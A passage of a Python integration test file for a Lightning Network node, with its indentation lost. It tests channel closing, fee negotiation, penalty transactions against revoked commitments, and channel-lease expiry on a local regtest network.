wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fundchannel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(TEST_NETWORK != 'regtest', 'FIXME: broken under elements')
@pytest.mark.slow_test
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/11000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 11000, 15000, 7400], [8000, 6000, 1001, 100]]
balance = [False, True]
num_peers = len(feerates) * len(balance)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for b in balance:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.balance = balance
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
mine_funding_to_announce(bitcoind, peers, num_blocks=6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.balance:
l1.pay(p, 100000000)
# Now close all channels (not unilaterally!)
closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'may_reconnect': True},
{'may_reconnect': True}])
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
l1.rpc.close(l2.info['id'])
l1.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
# Now verify that the closing tx is in the mempool.
bitcoind.generate_block(6, wait_for_mempool=1)
sync_blockheight(bitcoind, [l1, l2])
for n in [l1, l2]:
# Ensure we actually got a mutual close.
n.daemon.wait_for_log(r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_specified_destination(node_factory, bitcoind, chainparams):
l1, l2, l3, l4 = node_factory.get_nodes(4)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.rpc.connect(l4.info['id'], 'localhost', l4.port)
chan12, _ = l1.fundchannel(l2, 10**6)
chan13, _ = l1.fundchannel(l3, 10**6)
chan14, _ = l1.fundchannel(l4, 10**6)
l1.pay(l2, 100000000)
l1.pay(l3, 100000000)
l1.pay(l4, 100000000)
mine_funding_to_announce(bitcoind, [l1, l2, l3, l4])
addr = chainparams['example_addr']
l1.rpc.close(chan12, None, addr)
l1.rpc.call('close', {'id': chan13, 'destination': addr})
l1.rpc.call('close', [chan14, None, addr])
l1.daemon.wait_for_logs([' to CLOSINGD_SIGEXCHANGE'] * 3)
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == 3)
# Now grab the close transaction
closetxs = {}
for i, n in enumerate([l2, l3, l4]):
billboard = only_one(l1.rpc.listpeers(n.info['id'])['peers'][0]['channels'])['status'][0]
m = re.search(r'CLOSINGD_SIGEXCHANGE.* tx:([a-f0-9]{64})', billboard)
closetxs[n] = m.group(1)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
# l1 can't spent the output to addr.
for txid in closetxs.values():
assert not l1.daemon.is_in_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
# Check the txid has at least 1 confirmation
for n, txid in closetxs.items():
n.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
for n in [l2, l3, l4]:
# Make sure both nodes have grabbed their close tx funds
closetx = closetxs[n]
outputs = n.rpc.listfunds()['outputs']
assert closetx in set([o['txid'] for o in outputs])
output_num2 = [o for o in outputs if o['txid'] == closetx][0]['output']
output_num1 = 0 if output_num2 == 1 else 1
# Check the another address is addr
assert addr == scriptpubkey_addr(bitcoind.rpc.gettxout(closetx, output_num1)['scriptPubKey'])
assert 1 == bitcoind.rpc.gettxout(closetx, output_num1)['confirmations']
def closing_negotiation_step(node_factory, bitcoind, chainparams, opts):
def feerate_for(target, minimum=0, maximum=10000000):
"""Binary search to find feerate"""
assert minimum != maximum
mid = (minimum + maximum) // 2
mid_fee = closing_fee(mid, 1)
if mid_fee > target:
return feerate_for(target, minimum, mid)
elif mid_fee < target:
return feerate_for(target, mid, maximum)
else:
return mid
orate = feerate_for(21000) # closing fee negotiation starts at 21000
prate = feerate_for(20000) # closing fee negotiation starts at 20000
opener, peer = node_factory.line_graph(2, opts=[{'feerates': (orate, orate, orate, orate)},
{'feerates': (prate, prate, prate, prate)}])
opener_id = opener.info['id']
peer_id = peer.info['id']
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
if opts['close_initiated_by'] == 'opener':
opener.rpc.close(peer_id=peer_id, fee_negotiation_step=opts['fee_negotiation_step'])
else:
assert opts['close_initiated_by'] == 'peer'
peer.rpc.close(peer_id=opener_id, fee_negotiation_step=opts['fee_negotiation_step'])
# Get the proclaimed closing fee from the two nodes' statuses
status_agreed_regex = re.compile("agreed on a closing fee of ([0-9]+) satoshi")
# [fee_from_opener_status, fee_from_peer_status]
fees_from_status = [None, None]
def get_fee_from_status(node, peer_id, i):
nonlocal fees_from_status
peer = only_one(node.rpc.listpeers(peer_id)['peers'])
channel = only_one(peer['channels'])
status = channel['status'][0]
m = status_agreed_regex.search(status)
if not m:
return False
fees_from_status[i] = int(m.group(1))
return True
wait_for(lambda: get_fee_from_status(opener, peer_id, 0))
wait_for(lambda: get_fee_from_status(peer, opener_id, 1))
assert opts['expected_close_fee'] == fees_from_status[0]
assert opts['expected_close_fee'] == fees_from_status[1]
# Get the closing transaction from the bitcoind mempool and get its fee
mempool = None
mempool_tx_ids = None
def get_mempool_when_size_1():
nonlocal mempool, mempool_tx_ids
mempool = bitcoind.rpc.getrawmempool(True)
mempool_tx_ids = list(mempool.keys())
return len(mempool_tx_ids) == 1
wait_for(get_mempool_when_size_1)
close_tx_id = mempool_tx_ids[0]
# v22.99.0-8fe6f5a6fbcd at least doesn't have 'fee', it has 'fees'.
if 'fees' in mempool[close_tx_id]:
fee_mempool = round(mempool[close_tx_id]['fees']['base'] * 10**8)
else:
fee_mempool = round(mempool[close_tx_id]['fee'] * 10**8)
assert opts['expected_close_fee'] == fee_mempool
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_30pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 30%"""
opts = {}
opts['fee_negotiation_step'] = '30%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20537
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20233
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_100pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 100%"""
opts = {}
opts['fee_negotiation_step'] = '100%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20001
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
# The close fee of 20499 looks strange in this case - one would expect
# to have a number close to 21000. This is because
# * the range is initially set to [20000 (peer), 21000 (opener)]
# * the opener is always first to propose, he uses 50% step, so he proposes 20500
# * the range is narrowed to [20001, 20499] and the peer proposes 20499
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_1sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 1sat"""
opts = {}
opts['fee_negotiation_step'] = '1'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20989
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20010
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_700sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 700sat"""
opts = {}
opts['fee_negotiation_step'] = '700'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20151
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@pytest.mark.developer("needs dev-disable-commit-after")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an incoming HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'dev-disable-commit-after': 1,
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'dev-disable-commit-after': 1,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('got commitsig')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
# The first needle will match, but since we don't have a direct output
# for l2 it won't result in an output, hence the comment:
# r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# l1 loses all of their channel balance to the peer, as penalties
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['penalty'], None, None), ('external', ['penalty'], None, None)],
}
# l2 sweeps all of l1's closing outputs
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
# We use a subset of tags in expected_2 that are used in expected_1
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs dev-disable-commit-after")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an outgoing HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'dev-disable-commit-after': 3,
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'dev-disable-commit-after': 3,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('dev-disable-commit-after: disabling')
assert not l2.daemon.is_in_log('dev-disable-commit-after: disabling')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# l1 loses all of their channel balance to the peer, as penalties
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['penalty'], None, None), ('external', ['penalty'], None, None), ('external', ['penalty'], None, None)],
}
# l2 sweeps all of l1's closing outputs
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['deposit'], None, None), ('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
# We use a subset of tags in expected_2 that are used in expected_1
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_falls_behind(node_factory, bitcoind):
'''
If our peer falls too far behind/doesn't send us an update for
their blockheight, the lessor fails the channel
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# sink the funding transaction
bitcoind.generate_block(1, wait_for_mempool=1)
# stop l1
l1.stop()
# advance blockchain 1008 blocks, the lessor should drop to chain
bitcoind.generate_block(1008)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_log('Offline peer is too far behind, terminating')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.developer("requres 'dev-queryrates'")
@pytest.mark.slow_test
def test_channel_lease_post_expiry(node_factory, bitcoind, chainparams):
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'plugin': coin_mvt_plugin}
l1, l2, = node_factory.get_nodes(2, opts=opts)
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
# l1 leases a channel from l2
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
channel_id = first_channel_id(l1, l2)
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
# l2 attempts to close a channel that it leased, should fail
with pytest.raises(RpcError, match=r'Peer leased this channel from us'):
l2.rpc.close(l1.get_channel_scid(l2))
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 115')
# We need to give l1-l2 time to update their blockheights
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(32)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
# l1<->l2 mutual close should work
chan = l1.get_channel_scid(l2)
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.rpc.close(chan)
l2.daemon.wait_for_log('State changed from CLOSINGD_SIGEXCHANGE to CLOSINGD_COMPLETE')
bitcoind.generate_block(2)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
l2.daemon.wait_for_log('Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
channel_mvts_1 = [
{'type': 'chain_mvt', 'credit': 506432000, 'debit': 0, 'tags': ['channel_open', 'opener', 'leased']},
{'type': 'channel_mvt', 'credit': 0, 'debit': 6432000, 'tags': ['lease_fee'], 'fees': '0msat'},
{'type': 'channel_mvt', 'credit': 0, 'debit': 10000, 'tags': ['invoice'], 'fees': '0msat'},
{'type': 'chain_mvt', 'credit': 0, 'debit': 499990000, 'tags': ['channel_close']},
]
channel_mvts_2 = [
{'type': 'chain_mvt', 'credit': 500000000, 'debit': 0, 'tags': ['channel_open', 'leased']},
{'type': 'channel_mvt', 'credit': 6432000, 'debit': 0, 'tags': ['lease_fee'], 'fees': '0msat'},
{'type': 'channel_mvt', 'credit': 10000, 'debit': 0, 'tags': ['invoice'], 'fees': '0msat'},
{'type': 'chain_mvt', 'credit': 0, 'debit': 506442000, 'tags': ['channel_close']},
]
check_coin_moves(l1, channel_id, channel_mvts_1, chainparams)
check_coin_moves(l2, channel_id, channel_mvts_2, chainparams)
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_unilat_closes(node_factory, bitcoind):
'''
Check that channel leases work
l1-l2: l1 leases funds from l2; l1 goes to chain unilaterally
l2-l3: l2 leases funds from l3; l3 goes to chain unilaterally
'''
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'funder-lease-requests-only': False}
l1, l2, l3 = node_factory.get_nodes(3, opts=opts)
# Allow l2 some warnings
l2.allow_warning = True
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l3.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# l2 leases a channel from l3
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
rates = l2.rpc.dev_queryrates(l3.info['id'], amount, amount)
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers']) == 0)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.rpc.fundchannel(l3.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate), minconf=0,
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
l3.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l3.rpc.listchannels(l3.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
inv = l2.rpc.invoice(10**4, '3', 'no_3')
l3.rpc.pay(inv['bolt11'])
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2, l3])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 110')
l2.stop()
# unilateral close channels l1<->l2 & l3<->l2
l1.rpc.close(l2.info['id'], 1)
l3.rpc.close(l2.info['id'], 1, force_lease_closed=True)
# Wait til to_self_delay expires, l1 should claim to_local back
bitcoind.generate_block(10, wait_for_mempool=2)
l1.daemon.wait_for_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
bitcoind.generate_block(1, wait_for_mempool=1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal OUR_DELAYED_RETURN_TO_WALLET')
assert len(l1.rpc.listfunds()['outputs']) == 2
l2.start()
search_start = l2.daemon.logsearch_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 40.*')
utxo1 = re.match('.* adding utxo to watch (.*), csv .*', log).group(1)
l2.daemon.logsearch_start = search_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 1')
utxo3 = re.match('.* adding utxo to watch (.*), csv 1', log).group(1)
# we *shouldn't* be able to spend it, there's a lock on it
